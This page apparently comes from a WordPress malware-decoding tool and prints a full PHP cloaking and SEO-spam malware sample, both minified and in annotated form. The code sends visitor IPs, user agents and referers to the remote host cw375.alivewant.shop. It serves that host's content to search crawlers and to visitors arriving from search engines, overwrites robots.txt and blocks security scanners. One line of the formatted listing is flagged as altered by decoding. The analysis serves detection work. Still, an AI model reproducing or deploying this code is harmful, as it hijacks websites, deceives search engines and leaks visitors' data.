De-obfuscate PHP malware, viruses and tampering code found on WordPress sites back into readable code.
*Please note that not all obfuscated code can be decoded.
<?php
/*
 * Sample in its minified form; the same logic is listed again, formatted, further down this page.
 * What the code does: filters requests by User-Agent and client IP, forwards visitor details
 * (user agent, referer, language, IP, host, URI) to the endpoint in $datacenter, and echoes that
 * endpoint's response to search-engine crawlers and to visitors arriving from search results.
 * Indicators visible in the code: outbound HTTP to cw375.alivewant.shop, the files uxo.txt and
 * robots.txt written through relative paths, and the URI markers uuuuxxxxooo, pingsitemap.xml,
 * jp2023 and writerobots.
 */
error_reporting(0);function getrealIp(){if (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');}if (getenv('HTTP_X_REAL_IP')) {$ip = getenv('HTTP_X_REAL_IP');} elseif (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');$ips = explode(',', $ip);$ip = $ips[0];} elseif (getenv('REMOTE_ADDR')) {$ip = getenv('REMOTE_ADDR');} else {$ip = '0.0.0.0';}return $ip;}function get_url($url){$remoteContent = @file_get_contents($url);if(empty($remoteContent)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);if(strpos($url,"https://") !== false){curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);}$remoteContent = curl_exec($ch);curl_close($ch);}return $remoteContent;}if(preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 403 Forbidden');exit();}$botagent = "bing|google|yahoo";$datacenter = "http://cw375.alivewant.shop/index.php";$pc = "VgEAVQt";$useragent = urlencode($_SERVER['HTTP_USER_AGENT']);$refer = urlencode($_SERVER['HTTP_REFERER']);$language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);$realip = getrealIp();$ip = urlencode($realip);$domain = urlencode($_SERVER['HTTP_HOST']);$script = urlencode($_SERVER['SCRIPT_NAME']);if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! 
empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) {$_SERVER['REQUEST_SCHEME'] = 'https';} else {$_SERVER['REQUEST_SCHEME'] = 'http';}$http = urlencode($_SERVER['REQUEST_SCHEME']);$uri = urlencode($_SERVER['REQUEST_URI']);if(strpos($uri,"uuuuxxxxooo") !== false){echo "ok";exit();}if($realip == "153.246.135.238" || $realip == "219.101.44.233"){header('HTTP/1.0 403 Forbidden');exit();}$rewriteable = 0;if(!file_exists("uxo.txt")){$uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/uuuuxxxxooo';$dd = get_url($uuu);if($dd == "ok"){$rewriteable = 1;@file_put_contents("uxo.txt","1");}else{$rewriteable = 0;@file_put_contents("uxo.txt","0");}}else{$rewriteable = @file_get_contents("uxo.txt");}if(strpos($uri,"pingsitemap.xml") !== false){$scripname = $_SERVER['SCRIPT_NAME'];if( strpos( $scripname, "index.php") !== false){if($rewriteable == 0){$scripname = '/?';}else{$scripname = '/';}}else{$scripname = $scripname.'?';}$robots_contents = "User-agent: *\r\nAllow: /";$sitemap = "$http://" . $domain .$scripname. 
"sitemap.xml";$robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap";$sitemapstatus = "";echo $sitemap.": ".$sitemapstatus.'<br/>';$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script&sitemap=".urlencode($sitemap);$dd = get_url($requsturl); @file_put_contents("robots.txt",$robots_contents);exit();}else if(strpos($uri,"favicon.ico") !== false){}else if(strpos($uri,"jp2023") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);echo $dd;exit();return;}else if(strpos($uri,"robots.txt") !== false || strpos($uri,"writerobots") !== false){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";header('Content-Type: text/plain; charset=utf-8');echo $dd = get_url($requsturl);@file_put_contents("robots.txt",$dd);exit();}else if(preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else{header('Content-Type: text/xml; charset=utf-8');echo $dd;exit();return;}}else if(preg_match("/($botagent)/i", $_SERVER['HTTP_USER_AGENT'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable&script=$script";$dd = get_url($requsturl);if(!empty($dd)){if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}if(substr($dd,0,5)=="<?xml"){header('Content-Type: text/xml; charset=utf-8');}else{header('Content-Type: text/html; charset=utf-8');}echo $dd;exit();return;}}else 
if(preg_match("/($botagent)/i", $_SERVER['HTTP_REFERER'])){$requsturl = $datacenter."?agent=$useragent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$rewriteable";$dd = get_url($requsturl);if($dd == "500"){header("HTTP/1.0 500 Internal Server Error");exit();}else if(!empty($dd)){header('HTTP/1.1 404 Not Found');echo $dd;exit();return;}}else{}
?><?php
// Analyst note: turns off PHP error reporting for the request, so the warnings this script
// would otherwise raise (unchecked $_SERVER keys, failed fetches and file writes) are not reported.
error_reporting(0);
/**
 * Picks the address this script treats as the visitor's IP, preferring request headers
 * over the connection address.
 *
 * Effective order as written: HTTP_X_REAL_IP, else the first comma-separated entry of
 * HTTP_X_FORWARDED_FOR, else REMOTE_ADDR, else the literal '0.0.0.0'.
 *
 * Analyst note: the header-derived values are supplied by the client, so the address this
 * function returns (and that the script later forwards as the `ip` parameter and compares
 * against its hard-coded addresses) is not reliable evidence of where a request came from.
 *
 * @return string The chosen address, or '0.0.0.0' when none of the sources is set.
 */
function getrealIp()
{
// HTTP_CLIENT_IP is read here, but the if/elseif/else chain below assigns $ip on every
// path, so this value never survives to the return.
if (getenv('HTTP_CLIENT_IP')) {
$ip = getenv('HTTP_CLIENT_IP');
}
if (getenv('HTTP_X_REAL_IP')) {
$ip = getenv('HTTP_X_REAL_IP');
} elseif (getenv('HTTP_X_FORWARDED_FOR')) {
// X-Forwarded-For may hold a list; only the first entry is kept (not trimmed).
$ip = getenv('HTTP_X_FORWARDED_FOR');
$ips = explode(',', $ip);
$ip = $ips[0];
} elseif (getenv('REMOTE_ADDR')) {
$ip = getenv('REMOTE_ADDR');
} else {
$ip = '0.0.0.0';
}
return $ip;
}
/**
 * Fetches $url and returns the response body, trying file_get_contents() first and
 * falling back to cURL when that yields an empty result.
 *
 * Analyst note: every outbound request the script makes goes through this function, so
 * egress logs or proxy logs for the web server are the place to look for its traffic.
 * In the cURL path redirects are not followed and, for URLs containing "https://",
 * certificate and host-name verification are both disabled, so the response is accepted
 * from whoever answers.
 *
 * @param string $url Absolute URL to request.
 * @return string|false Response body; false when the cURL request fails.
 */
function get_url($url)
{
// '@' hides the warning raised when the URL wrapper is disabled or the request fails.
$remoteContent = @file_get_contents($url);
if (empty($remoteContent)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
// strpos() matches "https://" anywhere in the URL, not only at the start.
if (strpos($url, "https://") !== false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
$remoteContent = curl_exec($ch);
curl_close($ch);
}
return $remoteContent;
}
// Gate 1: answer 403 to any User-Agent containing one of these names. The match is
// case-insensitive and unanchored, so short entries such as "Java", "oBot" and "Python"
// match as substrings. The list mixes SEO crawlers, scripting clients and a security
// vendor name, which means a scripted fetch of the site receives a 403 instead of the
// behaviour below; a clean-looking automated scan is therefore not evidence of a clean site.
if (preg_match("/(Bytespider|PetalBot|AhrefsBot|Barkrowler|MJ12bot|FeedDemon|JikeSpider|Indy Library|AskTbFXTV|CrawlDaddy|CoolpadWebkit|Java|Feedly|UniversalFeedParser|ApacheBench|Swiftbot|ZmEu|oBot|jaunty|Python-urllib|python-requests|lightDeckReports Bot|YYSpider|DigExt|YisouSpider|HttpClient|heritrix|EasouSpider|Ezooms|AmazonBot|SEMrushBot|YandexBot|paloaltonetworks|Python)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
// Substrings that the dispatch code further down treats as "search engine" when found in
// the User-Agent or the Referer.
$botagent = "bing|google|yahoo";
// Remote endpoint that receives every report and supplies every response body below,
// over plain HTTP. Network indicator: outbound requests from the web server to this host.
$datacenter = "http://cw375.alivewant.shop/index.php";
// Fixed token forwarded as the `pc` parameter; its meaning is not visible in this code
// (presumably an installation or campaign identifier - unconfirmed).
$pc = "VgEAVQt";
// Request attributes, URL-encoded for forwarding. None of the $_SERVER keys is checked
// with isset() first.
$useragent = urlencode($_SERVER['HTTP_USER_AGENT']);
$refer = urlencode($_SERVER['HTTP_REFERER']);
$language = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']);
$realip = getrealIp();
$ip = urlencode($realip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
// Normalises the scheme to 'http' or 'https' and writes it back into $_SERVER, which
// changes what any code running later in the same request sees. X-Forwarded-Proto is a
// request header, so the result can be influenced by the client.
if (!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https' || !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on' || !empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443' || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
// $uri holds the URL-encoded request URI ('/' becomes '%2F'). The strpos() markers used
// on it consist of letters, digits and dots, which urlencode() leaves unchanged.
$uri = urlencode($_SERVER['REQUEST_URI']);
// Self-test marker: any URI containing this string is answered with the literal body "ok".
// The probe below requests this path from the site itself. For triage, an "ok" body for
// this otherwise meaningless path indicates the script is active on the host.
if (strpos($uri, "uuuuxxxxooo") !== false) {
echo "ok";
exit;
}
// Gate 2: two hard-coded addresses always receive a 403. Why these two are singled out
// is not visible in the code.
if ($realip == "153.246.135.238" || $realip == "219.101.44.233") {
header('HTTP/1.0 403 Forbidden');
exit;
}
// One-time probe whose result is cached in uxo.txt. The path is relative, so the file is
// created in the process's current working directory; it is a file-system indicator.
// The probe fetches /uuuuxxxxooo from this host and records 1 when the body is "ok",
// otherwise 0 - presumably a test of whether arbitrary paths are routed to this script.
$rewriteable = 0;
if (!file_exists("uxo.txt")) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/uuuuxxxxooo';
$dd = get_url($uuu);
if ($dd == "ok") {
$rewriteable = 1;
@file_put_contents("uxo.txt", "1");
} else {
$rewriteable = 0;
@file_put_contents("uxo.txt", "0");
}
} else {
// Comes back as a string ("1" or "0"), or false when the read fails; the later
// `== 0` test is a loose comparison.
$rewriteable = @file_get_contents("uxo.txt");
}
// Dispatch on the request. Every branch that contacts the remote endpoint sends it the
// visitor's user agent, referer, language and IP together with the host, scheme, URI and
// script name, so visitor details leave the site on each of these requests. Whatever the
// endpoint returns is echoed without inspection, so the remote party decides what the
// site serves in these branches.
//
// Branch 1 - "pingsitemap.xml": build a sitemap URL for this host, report it to the
// endpoint, and overwrite robots.txt (relative path) with an allow-all policy plus a
// Sitemap line. A robots.txt that changed unexpectedly is a file-system indicator.
if (strpos($uri, "pingsitemap.xml") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.php") !== false) {
// Loose comparison against the cached probe result.
if ($rewriteable == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
// Always empty in this code, so the echoed line ends after the colon.
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}&sitemap=" . urlencode($sitemap);
// The response is fetched but not used in this branch.
$dd = get_url($requsturl);
@file_put_contents("robots.txt", $robots_contents);
exit;
} else {
// Branch 2 - "favicon.ico": deliberately does nothing and does not exit.
if (strpos($uri, "favicon.ico") !== false) {
} else {
// Branch 3 - "jp2023": echo the endpoint's response as-is, with no Content-Type set here.
if (strpos($uri, "jp2023") !== false) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
echo $dd;
exit;
} else {
// Branch 4 - "robots.txt" / "writerobots": serve the endpoint's response as text/plain
// and also write it to robots.txt, so the remote party controls the site's robots policy.
if (strpos($uri, "robots.txt") !== false || strpos($uri, "writerobots") !== false) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
header('Content-Type: text/plain; charset=utf-8');
echo $dd = get_url($requsturl);
@file_put_contents("robots.txt", $dd);
exit;
} else {
// Branch 5 - request URI ending in "xml": the dot in the pattern is unescaped, so any
// character followed by "xml" at the end of the raw REQUEST_URI matches. The endpoint's
// response is served as text/xml; the literal body "500" is turned into an HTTP 500.
if (preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else {
header('Content-Type: text/xml; charset=utf-8');
echo $dd;
exit;
}
} else {
// Branch 6 - User-Agent contains bing, google or yahoo: the crawler is served the
// endpoint's response instead of the site's own page, while other visitors are not
// (cloaking). An empty response falls through without exiting.
if (preg_match("/({$botagent})/i", $_SERVER['HTTP_USER_AGENT'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}&script={$script}";
$dd = get_url($requsturl);
if (!empty($dd)) {
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
// NOTE(review): this listing compares a 5-character prefix with the 9-character string
// "<?php xml", which can never be equal, so the text/xml header is unreachable as printed.
// The minified listing on this page has "<?xml" at this point; the difference looks like
// an artefact of the decoding step rather than part of the sample.
if (substr($dd, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
echo $dd;
exit;
}
} else {
// Branch 7 - Referer contains bing, google or yahoo: a visitor arriving from a search
// result gets the endpoint's response under an HTTP 404 status. What that body contains
// is not visible here. This request omits the `script` parameter the other branches send.
if (preg_match("/({$botagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $datacenter . "?agent={$useragent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$rewriteable}";
$dd = get_url($requsturl);
if ($dd == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
} else {
if (!empty($dd)) {
header('HTTP/1.1 404 Not Found');
echo $dd;
exit;
}
}
} else {
// Everything else: no output and no exit, so execution continues with whatever follows
// this code in the file and the request is handled as usual.
}
}
}
}
}
}
}Malware detection & removal plugin for WordPress